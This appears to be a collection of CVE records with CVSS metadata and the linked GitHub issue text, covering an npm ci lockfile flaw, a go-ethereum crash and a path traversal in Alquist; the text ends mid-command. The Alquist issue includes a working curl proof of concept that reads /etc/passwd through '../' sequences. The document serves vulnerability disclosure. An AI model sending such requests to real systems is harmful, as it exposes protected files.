The npm ci command in npm 7.x and 8.x through 8.1.3 proceeds with an installation even if dependency information in package-lock.json differs from package.json. This behavior is inconsistent with the documentation, and makes it easier for attackers to install malware that was supposed to have been blocked by an exact version match requirement in package-lock.json. NOTE: The npm team believes this is not a vulnerability. It would require someone to socially engineer package.json which has different dependencies than package-lock.json. That user would have to have file system or write access to change dependencies. The npm team states preventing malicious actors from socially engineering or gaining file system access is outside the scope of the npm CLI.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 6, "source": "cve@mitre.org", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product", "Vendor Advisory" ], "url": "https://docs.npmjs.com/cli/v7/commands/npm-ci" }, { "source": "cve@mitre.org", "tags": null, "url": "https://docs.npmjs.com/cli/v8/commands/npm-ci" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/icatalina/CVE-2021-43616" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/npm/cli/commit/457e0ae61bbc55846f5af44afa4066921923490f" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/npm/cli/issues/2701" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/npm/cli/issues/2701#issuecomment-972900511" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/npm/cli/issues/2701#issuecomment-979054224" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXNVFKOF5ZYH5NIRWHKN6O6UBCHDV6FE/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://medium.com/cider-sec/this-time-we-were-lucky-85c0dcac94a0" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211210-0002/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Vendor Advisory" ], "url": "https://docs.npmjs.com/cli/v7/commands/npm-ci" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://docs.npmjs.com/cli/v8/commands/npm-ci" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/icatalina/CVE-2021-43616" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/npm/cli/commit/457e0ae61bbc55846f5af44afa4066921923490f" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/npm/cli/issues/2701" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/npm/cli/issues/2701#issuecomment-972900511" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/npm/cli/issues/2701#issuecomment-979054224" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXNVFKOF5ZYH5NIRWHKN6O6UBCHDV6FE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://medium.com/cider-sec/this-time-we-were-lucky-85c0dcac94a0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211210-0002/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*", "matchCriteriaId": "F582C303-4B6A-4B12-9E0A-BEB12E1B93D1", "versionEndExcluding": null, "versionEndIncluding": "7.24.2", "versionStartExcluding": null, "versionStartIncluding": "7.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*", "matchCriteriaId": "DF29872C-4C3F-4DD4-ABEB-64246074752A", "versionEndExcluding": null, "versionEndIncluding": "8.1.3", "versionStartExcluding": null, "versionStartIncluding": "8.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:next_generation_application_programming_interface:-:*:*:*:*:*:*:*", "matchCriteriaId": "444CE322-1245-4EEB-A5CA-9FCB011BF531", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "345" ]
345
https://github.com/npm/cli/issues/2701
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "npm", "cli" ]
### Current Behavior: `npm ci` does not fail when `package.json` doesn't match `package-lock.json` ### Expected Behavior: `npm ci` refuses to install when the lock file is invalid. ### Steps To Reproduce: 1. Manually bump a major version of a dependency in `package.json` 2. Run `npm ci` 3. It should fail but performs the whole installation ### npm@7 <img width="531" alt="image" src="https://user-images.githubusercontent.com/4542735/107903616-d4763f80-6f9d-11eb-8a64-345635eee6d3.png"> ### npm@6 <img width="746" alt="image" src="https://user-images.githubusercontent.com/4542735/107903652-ece65a00-6f9d-11eb-9401-d78aa3fc596f.png"> ### Environment: - OS: Mac OS - Node: 14.15.3 - npm: 7.5.4
[BUG] `npm ci` succeeds when `package-lock.json` doesn't match `package.json`
https://api.github.com/repos/npm/cli/issues/2701/comments
50
2021-02-15T03:57:16Z
2022-04-25T00:08:00Z
https://github.com/npm/cli/issues/2701
808,144,219
2,701
2,787
CVE-2021-43616
2021-11-13T18:15:07.537
The npm ci command in npm 7.x and 8.x through 8.1.3 proceeds with an installation even if dependency information in package-lock.json differs from package.json. This behavior is inconsistent with the documentation, and makes it easier for attackers to install malware that was supposed to have been blocked by an exact version match requirement in package-lock.json. NOTE: The npm team believes this is not a vulnerability. It would require someone to socially engineer package.json which has different dependencies than package-lock.json. That user would have to have file system or write access to change dependencies. The npm team states preventing malicious actors from socially engineering or gaining file system access is outside the scope of the npm CLI.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 6, "source": "cve@mitre.org", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product", "Vendor Advisory" ], "url": "https://docs.npmjs.com/cli/v7/commands/npm-ci" }, { "source": "cve@mitre.org", "tags": null, "url": "https://docs.npmjs.com/cli/v8/commands/npm-ci" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/icatalina/CVE-2021-43616" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/npm/cli/commit/457e0ae61bbc55846f5af44afa4066921923490f" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/npm/cli/issues/2701" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/npm/cli/issues/2701#issuecomment-972900511" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/npm/cli/issues/2701#issuecomment-979054224" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXNVFKOF5ZYH5NIRWHKN6O6UBCHDV6FE/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://medium.com/cider-sec/this-time-we-were-lucky-85c0dcac94a0" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211210-0002/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Vendor Advisory" ], "url": "https://docs.npmjs.com/cli/v7/commands/npm-ci" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://docs.npmjs.com/cli/v8/commands/npm-ci" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/icatalina/CVE-2021-43616" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/npm/cli/commit/457e0ae61bbc55846f5af44afa4066921923490f" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/npm/cli/issues/2701" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/npm/cli/issues/2701#issuecomment-972900511" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/npm/cli/issues/2701#issuecomment-979054224" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXNVFKOF5ZYH5NIRWHKN6O6UBCHDV6FE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://medium.com/cider-sec/this-time-we-were-lucky-85c0dcac94a0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211210-0002/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*", "matchCriteriaId": "F582C303-4B6A-4B12-9E0A-BEB12E1B93D1", "versionEndExcluding": null, "versionEndIncluding": "7.24.2", "versionStartExcluding": null, "versionStartIncluding": "7.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*", "matchCriteriaId": "DF29872C-4C3F-4DD4-ABEB-64246074752A", "versionEndExcluding": null, "versionEndIncluding": "8.1.3", "versionStartExcluding": null, "versionStartIncluding": "8.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:next_generation_application_programming_interface:-:*:*:*:*:*:*:*", "matchCriteriaId": "444CE322-1245-4EEB-A5CA-9FCB011BF531", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "345" ]
345
https://github.com/npm/cli/issues/2701#issuecomment-972900511
null
github.com
[ "npm", "cli" ]
### Current Behavior: `npm ci` does not fail when `package.json` doesn't match `package-lock.json` ### Expected Behavior: `npm ci` refuses to install when the lock file is invalid. ### Steps To Reproduce: 1. Manually bump a major version of a dependency in `package.json` 2. Run `npm ci` 3. It should fail but performs the whole installation ### npm@7 <img width="531" alt="image" src="https://user-images.githubusercontent.com/4542735/107903616-d4763f80-6f9d-11eb-8a64-345635eee6d3.png"> ### npm@6 <img width="746" alt="image" src="https://user-images.githubusercontent.com/4542735/107903652-ece65a00-6f9d-11eb-9401-d78aa3fc596f.png"> ### Environment: - OS: Mac OS - Node: 14.15.3 - npm: 7.5.4
[BUG] `npm ci` succeeds when `package-lock.json` doesn't match `package.json`
https://api.github.com/repos/npm/cli/issues/2701/comments
50
2021-02-15T03:57:16Z
2022-04-25T00:08:00Z
https://github.com/npm/cli/issues/2701
808,144,219
2,701
2,788
CVE-2021-43616
2021-11-13T18:15:07.537
The npm ci command in npm 7.x and 8.x through 8.1.3 proceeds with an installation even if dependency information in package-lock.json differs from package.json. This behavior is inconsistent with the documentation, and makes it easier for attackers to install malware that was supposed to have been blocked by an exact version match requirement in package-lock.json. NOTE: The npm team believes this is not a vulnerability. It would require someone to socially engineer package.json which has different dependencies than package-lock.json. That user would have to have file system or write access to change dependencies. The npm team states preventing malicious actors from socially engineering or gaining file system access is outside the scope of the npm CLI.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 6, "source": "cve@mitre.org", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product", "Vendor Advisory" ], "url": "https://docs.npmjs.com/cli/v7/commands/npm-ci" }, { "source": "cve@mitre.org", "tags": null, "url": "https://docs.npmjs.com/cli/v8/commands/npm-ci" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/icatalina/CVE-2021-43616" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/npm/cli/commit/457e0ae61bbc55846f5af44afa4066921923490f" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/npm/cli/issues/2701" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/npm/cli/issues/2701#issuecomment-972900511" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/npm/cli/issues/2701#issuecomment-979054224" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXNVFKOF5ZYH5NIRWHKN6O6UBCHDV6FE/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://medium.com/cider-sec/this-time-we-were-lucky-85c0dcac94a0" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211210-0002/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Vendor Advisory" ], "url": "https://docs.npmjs.com/cli/v7/commands/npm-ci" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://docs.npmjs.com/cli/v8/commands/npm-ci" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/icatalina/CVE-2021-43616" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/npm/cli/commit/457e0ae61bbc55846f5af44afa4066921923490f" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/npm/cli/issues/2701" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/npm/cli/issues/2701#issuecomment-972900511" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/npm/cli/issues/2701#issuecomment-979054224" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NXNVFKOF5ZYH5NIRWHKN6O6UBCHDV6FE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://medium.com/cider-sec/this-time-we-were-lucky-85c0dcac94a0" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20211210-0002/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*", "matchCriteriaId": "F582C303-4B6A-4B12-9E0A-BEB12E1B93D1", "versionEndExcluding": null, "versionEndIncluding": "7.24.2", "versionStartExcluding": null, "versionStartIncluding": "7.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:*", "matchCriteriaId": "DF29872C-4C3F-4DD4-ABEB-64246074752A", "versionEndExcluding": null, "versionEndIncluding": "8.1.3", "versionStartExcluding": null, "versionStartIncluding": "8.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:next_generation_application_programming_interface:-:*:*:*:*:*:*:*", "matchCriteriaId": "444CE322-1245-4EEB-A5CA-9FCB011BF531", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "345" ]
345
https://github.com/npm/cli/issues/2701#issuecomment-979054224
null
github.com
[ "npm", "cli" ]
### Current Behavior: `npm ci` does not fail when `package.json` doesn't match `package-lock.json` ### Expected Behavior: `npm ci` refuses to install when the lock file is invalid. ### Steps To Reproduce: 1. Manually bump a major version of a dependency in `package.json` 2. Run `npm ci` 3. It should fail but performs the whole installation ### npm@7 <img width="531" alt="image" src="https://user-images.githubusercontent.com/4542735/107903616-d4763f80-6f9d-11eb-8a64-345635eee6d3.png"> ### npm@6 <img width="746" alt="image" src="https://user-images.githubusercontent.com/4542735/107903652-ece65a00-6f9d-11eb-9401-d78aa3fc596f.png"> ### Environment: - OS: Mac OS - Node: 14.15.3 - npm: 7.5.4
[BUG] `npm ci` succeeds when `package-lock.json` doesn't match `package.json`
https://api.github.com/repos/npm/cli/issues/2701/comments
50
2021-02-15T03:57:16Z
2022-04-25T00:08:00Z
https://github.com/npm/cli/issues/2701
808,144,219
2,701
2,789
CVE-2021-43495
2021-11-15T13:15:07.663
AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/AlquistManager/alquist/issues/43" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/AlquistManager/alquist/issues/43" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:alquistai:alquist:2017-06-13:*:*:*:*:*:*:*", "matchCriteriaId": "022CFA01-411F-40C5-80A2-7FED3557C578", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/AlquistManager/alquist/issues/43
[ "Exploit", "Third Party Advisory" ]
github.com
[ "AlquistManager", "alquist" ]
A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system). This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”. ## Root Cause Analysis In the case of Alquist, the path traversal vulnerability can be blamed on incorrect usage of the `send_from_directory` Flask call. The vulnerability occurs due to the code snippet shown below https://github.com/AlquistManager/alquist/blob/280d99f43b11378212652e75f6f3159cde9c1d36/IO/input.py#L79-L82 Here, since the `path` and `file` parameters are attacker controlled, the effective directory and filename passed to the `send_from_directory` call can be controlled by the attacker leading to a path traversal attack. ## Proof of Concept The bug can be verified using the proof of concept similar to the one shown below. ``` curl -i --path-as-is -s -k -X $'GET' \ -H $'Host: 0.0.0.0:5000' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ $'http://0.0.0.0:5000/asd/../../../../../../../../etc/passwd' ``` ## Remediation This can be easily fixed my restricting the value of `file` and `path` parameters by a fixed whitelist of possible values. ## CVSS 3 Score CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H This bug was found using *[CodeQL by Github](codeql.github.com/)*
[Security] : Path Traversal in the IO module
https://api.github.com/repos/AlquistManager/alquist/issues/43/comments
2
2021-09-22T22:32:57Z
2022-04-23T22:45:19Z
https://github.com/AlquistManager/alquist/issues/43
1,004,831,876
43
2,790
CVE-2021-43668
2021-11-18T16:15:09.230
Go-Ethereum 1.10.9 nodes crash (denial of service) after receiving a serial of messages and cannot be recovered. They will crash with "runtime error: invalid memory address or nil pointer dereference" and arise a SEGV signal.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ethereum/go-ethereum/issues/23866" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ethereum/go-ethereum/issues/23866" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ethereum:go_ethereum:1.10.9:*:*:*:*:*:*:*", "matchCriteriaId": "AB7CCF6D-23C7-4373-BE4C-A6AE336F38E6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/ethereum/go-ethereum/issues/23866
[ "Third Party Advisory" ]
github.com
[ "ethereum", "go-ethereum" ]
#### System information Geth version: `1.10.9-unstable-9ada4a2e-20210910` OS & Version: MacOS Network: Private test net #### Expected behaviour Node sync block in the private net. #### Actual behaviour Node crashed down with "runtime error: invalid memory address or nil pointer dereference" #### Steps to reproduce the behaviour 1. setup a 10-node private geth nodes lcoally 2. setup a fuzzing node continually sending fuzzed messages to other 10 normal geth nodes. 3. After more than 24 hours fuzzing experiment, one of the geth node who is run in fast mode crashed down. The running command for the node is ````./build/bin/geth --identity "ETH-node10" --datadir "node10" --ethash.dagdir "node10" --port "30312" --maxpeers 15 --networkid 10086 --syncmode "fast" --bootnodes "enode://e71bec68f09c4b9567bd4575d855ea61b179b1d64e6f78c861ebddf3783178f95edaaf39647c1f792bc654d0931ad25415d50c25c437787183c0b0a32a76da85@127.0.0.1:0?discport=30301" --mine --miner.etherbase 